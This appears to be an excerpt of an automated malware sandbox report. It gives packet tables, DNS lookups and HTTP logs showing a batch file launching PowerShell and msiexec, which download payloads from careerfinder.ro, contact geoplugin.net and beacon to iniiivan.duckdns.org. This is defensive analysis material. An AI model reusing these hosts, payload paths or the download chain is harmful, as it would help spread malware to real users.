Oct 16, 2024 13:08:20.179748058 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:20.179758072 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:20.179790020 CEST | 49894 | 53848 | 192.168.2.5 | 94.198.96.165
Oct 16, 2024 13:08:20.179797888 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:20.179807901 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:20.179817915 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:20.179892063 CEST | 49894 | 53848 | 192.168.2.5 | 94.198.96.165
Oct 16, 2024 13:08:20.179912090 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:20.179958105 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:20.179968119 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:20.179981947 CEST | 49894 | 53848 | 192.168.2.5 | 94.198.96.165
Oct 16, 2024 13:08:20.180059910 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:20.180061102 CEST | 49894 | 53848 | 192.168.2.5 | 94.198.96.165
Oct 16, 2024 13:08:20.180068970 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:20.180079937 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:20.180100918 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:20.180155039 CEST | 49894 | 53848 | 192.168.2.5 | 94.198.96.165
Oct 16, 2024 13:08:20.180183887 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:20.180207968 CEST | 49894 | 53848 | 192.168.2.5 | 94.198.96.165
Oct 16, 2024 13:08:20.180217981 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:20.180227041 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:20.180298090 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:20.180306911 CEST | 49894 | 53848 | 192.168.2.5 | 94.198.96.165
Oct 16, 2024 13:08:20.180308104 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:20.180318117 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:20.180392981 CEST | 49894 | 53848 | 192.168.2.5 | 94.198.96.165
Oct 16, 2024 13:08:20.180659056 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:20.180777073 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:20.180864096 CEST | 49894 | 53848 | 192.168.2.5 | 94.198.96.165
Oct 16, 2024 13:08:20.181214094 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
Oct 16, 2024 13:08:20.181225061 CEST | 53848 | 49894 | 94.198.96.165 | 192.168.2.5
                                                                  Oct 16, 2024 13:08:20.181242943 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.181252003 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.181263924 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.181273937 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.181282997 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.181305885 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:20.181358099 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.181365967 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.181406021 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:20.181495905 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:20.182178020 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.182188988 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.182200909 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.182210922 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.182220936 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.182229996 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.182245970 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.182255983 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.182266951 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.182276011 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.182282925 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:20.182287931 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.182297945 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.182336092 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.182343960 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.182389975 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:20.182427883 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.182437897 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.182445049 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:20.182447910 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.182559967 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:20.182581902 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.182591915 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.182609081 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.182619095 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.182629108 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.182636976 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.182657957 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:20.182719946 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:20.182733059 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.182782888 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.182791948 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.182802916 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.182806015 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:20.182908058 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:20.182955980 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.182965994 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.182976007 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.183005095 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.183013916 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.183041096 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:20.183096886 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:20.183459044 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.183476925 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.183557987 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:20.183681965 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.183692932 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.183702946 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.183769941 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:20.183789968 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.183840036 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.183845043 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:20.183849096 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.183940887 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:20.183942080 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.183969975 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.183979034 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.184051037 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:20.184129000 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.184205055 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:20.184241056 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.184250116 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.184319973 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.184329033 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.184329033 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:20.184339046 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.184348106 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.184416056 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:20.184443951 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.184494019 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.184503078 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.184580088 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:20.185312033 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.185337067 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.185345888 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.185425043 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:20.185442924 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.185451984 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.185518980 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:20.185548067 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.185556889 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.185566902 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.185575962 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.185595989 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.185622931 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:20.185631990 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.185642958 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.185652971 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.185674906 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:20.185712099 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.185762882 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:20.185826063 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.185834885 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.185847044 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.185899019 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.185909033 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.185918093 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:20.185944080 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.185954094 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.185964108 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.185998917 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:20.186048031 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:20.186068058 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.186100960 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.186129093 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:20.186177015 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.186187029 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.186218977 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.186248064 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.186254025 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:20.186258078 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.186307907 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.186342955 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:20.186589956 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.186618090 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.186626911 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.186655045 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.186691046 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:20.187064886 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.187074900 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.187153101 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:20.187211990 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.187222958 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.187232018 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.187283039 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.187300920 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:20.187342882 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.187352896 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.187361956 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.187418938 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:20.187442064 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.187453985 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.187534094 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:20.187561035 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.187570095 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.187580109 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.187589884 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.187664032 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:20.187700033 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.187711954 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.187721014 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.187788963 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.187793970 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:20.187798977 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.187845945 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.187872887 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:20.187921047 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:20.187937021 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.187946081 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.187956095 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.187975883 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.188023090 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:20.188067913 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.188077927 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.188086987 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.188097000 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:20.188165903 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:20.189032078 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:23.481637001 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:23.486500025 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:23.486531973 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:23.486572027 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:23.486587048 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:23.486612082 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:23.486612082 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:23.486634970 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:23.486644983 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:23.486665010 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:23.486757994 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:23.486769915 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:23.486780882 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:23.486807108 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:23.491482973 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:23.491504908 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:23.491535902 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:23.491547108 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:23.491566896 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:23.491642952 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:23.491655111 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:23.551141024 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:23.556657076 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:23.556729078 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:29.019367933 CEST538484988794.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:29.020740032 CEST4988753848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:29.025717020 CEST538484988794.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:59.082875013 CEST538484988794.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:59.084712982 CEST4988753848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:59.089556932 CEST538484988794.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:09:29.133788109 CEST538484988794.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:09:29.135312080 CEST4988753848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:09:29.140217066 CEST538484988794.198.96.165192.168.2.5
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 16, 2024 13:07:26.064728975 CEST | 58059 | 53 | 192.168.2.5 | 1.1.1.1
Oct 16, 2024 13:07:26.109891891 CEST | 53 | 58059 | 1.1.1.1 | 192.168.2.5
Oct 16, 2024 13:08:15.094805956 CEST | 56956 | 53 | 192.168.2.5 | 1.1.1.1
Oct 16, 2024 13:08:15.230496883 CEST | 53 | 56956 | 1.1.1.1 | 192.168.2.5
Oct 16, 2024 13:08:17.126616001 CEST | 56189 | 53 | 192.168.2.5 | 1.1.1.1
Oct 16, 2024 13:08:17.133737087 CEST | 53 | 56189 | 1.1.1.1 | 192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 16, 2024 13:07:26.064728975 CEST | 192.168.2.5 | 1.1.1.1 | 0x91d6 | Standard query (0) | careerfinder.ro | A (IP address) | IN (0x0001) | false
Oct 16, 2024 13:08:15.094805956 CEST | 192.168.2.5 | 1.1.1.1 | 0xf553 | Standard query (0) | iniiivan.duckdns.org | A (IP address) | IN (0x0001) | false
Oct 16, 2024 13:08:17.126616001 CEST | 192.168.2.5 | 1.1.1.1 | 0x8d50 | Standard query (0) | geoplugin.net | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 16, 2024 13:07:26.109891891 CEST | 1.1.1.1 | 192.168.2.5 | 0x91d6 | No error (0) | careerfinder.ro | (none) | 185.248.196.6 | A (IP address) | IN (0x0001) | false
Oct 16, 2024 13:08:15.230496883 CEST | 1.1.1.1 | 192.168.2.5 | 0xf553 | No error (0) | iniiivan.duckdns.org | (none) | 94.198.96.165 | A (IP address) | IN (0x0001) | false
Oct 16, 2024 13:08:17.133737087 CEST | 1.1.1.1 | 192.168.2.5 | 0x8d50 | No error (0) | geoplugin.net | (none) | 178.237.33.50 | A (IP address) | IN (0x0001) | false
                                                                  • careerfinder.ro
                                                                  • geoplugin.net
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49895 | 178.237.33.50 | 80 | 6764 | C:\Windows\SysWOW64\msiexec.exe

Timestamp | Bytes transferred | Direction | Data
Oct 16, 2024 13:08:17.139307022 CEST | 71 | OUT | GET /json.gp HTTP/1.1
Host: geoplugin.net
Cache-Control: no-cache
Oct 16, 2024 13:08:17.984025002 CEST | 1164 | IN | HTTP/1.1 200 OK
date: Wed, 16 Oct 2024 11:08:17 GMT
server: Apache
content-length: 956
content-type: application/json; charset=utf-8
cache-control: public, max-age=300
access-control-allow-origin: *
                                                                  Data Ascii: { "geoplugin_request":"155.94.241.186", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"Dallas", "geoplugin_region":"Texas", "geoplugin_regionCode":"TX", "geoplugin_regionName":"Texas", "geoplugin_areaCode":"", "geoplugin_dmaCode":"623", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"32.8137", "geoplugin_longitude":"-96.8704", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/Chicago", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49704 | 185.248.196.6 | 443 | 3664 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-16 11:07:27 UTC | 178 | OUT | GET /vn/Traurigheder.sea HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Host: careerfinder.ro
Connection: Keep-Alive
2024-10-16 11:07:27 UTC | 459 | IN | HTTP/1.1 200 OK
Connection: close
cache-control: public, max-age=0
expires: Wed, 16 Oct 2024 11:07:27 GMT
content-type: application/octet-stream
last-modified: Tue, 15 Oct 2024 11:20:36 GMT
accept-ranges: bytes
content-length: 472124
date: Wed, 16 Oct 2024 11:07:27 GMT
alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49870 | 185.248.196.6 | 443 | 6764 | C:\Windows\SysWOW64\msiexec.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-16 11:08:13 UTC | 167 | OUT | GET /rs/wQpkVl14.bin HTTP/1.1
User-Agent: 5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Host: careerfinder.ro
Cache-Control: no-cache
2024-10-16 11:08:13 UTC | 459 | IN | HTTP/1.1 200 OK
Connection: close
cache-control: public, max-age=0
expires: Wed, 16 Oct 2024 11:08:13 GMT
content-type: application/octet-stream
last-modified: Tue, 15 Oct 2024 11:02:27 GMT
accept-ranges: bytes
content-length: 494656
date: Wed, 16 Oct 2024 11:08:13 GMT
alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"



                                                                  Target ID:0
                                                                  Start time:07:07:22
                                                                  Start date:16/10/2024
                                                                  Path:C:\Windows\System32\cmd.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\MARSS-FILTRY_ZW015010024.bat" "
                                                                  Imagebase:0x7ff75bd40000
                                                                  File size:289'792 bytes
                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:1
                                                                  Start time:07:07:22
                                                                  Start date:16/10/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff6d64d0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:2
                                                                  Start time:07:07:22
                                                                  Start date:16/10/2024
                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  Wow64 process (32bit):false
